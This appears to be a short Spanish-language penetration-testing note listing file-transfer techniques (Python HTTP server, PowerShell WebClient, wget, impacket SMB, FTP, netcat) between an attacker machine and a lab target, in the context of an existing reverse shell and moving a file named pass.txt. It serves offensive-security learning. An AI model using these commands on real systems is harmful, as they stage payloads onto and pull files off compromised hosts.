Transferencia de ficheros
Técnicas de transferencia de ficheros
Powershell / Wget
- Comando para servir el fichero en Linux y Windows:
python -m SimpleHTTPServer 8080
- Comando para recibir el fichero en Windows:
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.20.129:8080/pass.txt~','C:\Users\ws02\Desktop\FiletoTransfer.txt')"
- Comando para recibir el fichero en Linux:
wget http://192.168.20.X:8080/FiletoTransfer
SMB
- Comando para servir el fichero en Linux:
impacket-smbserver -smb2support test .
- Comando para recibir el fichero en Windows:
copy \\192.168.20.129\test\pass.txt FiletoTransfer.txt
FTP
- Comando para servir el fichero en Linux:
twistd3 -n ftp -r .
- Comando para recibir el fichero en Windows:
- ftp
- open 192.168.20.X 2121
- anonymous
- get FiletoTransfer
- bye
- Comando para recibir el fichero en Linux
wget ftp://192.168.20.X:2121/FiletoTransfer
Netcat
- Comando para recibir el fichero en Linux y Windows:
nc.exe -lvp 4444 > FiletoTransfer
- Comando para servir el fichero en Linux y Windows:
nc 192.168.20.X 4444 -w 3 < FiletoTransfer
Normalmente se dan dos casos en los que nos podemos encontrar diferentes maneras de transferir los archivos:
- Acceso lógico o físico a la interfaz gráfica objetivo
- Acceso remoto con una shell reversa sin UID
Para hacer esto vamos a aprovechar la reverse shell que teniamos con el binario que creamos en C#
